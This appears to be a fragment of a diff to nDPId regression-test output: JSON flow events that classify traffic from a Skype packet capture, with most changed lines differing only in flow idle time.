-00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
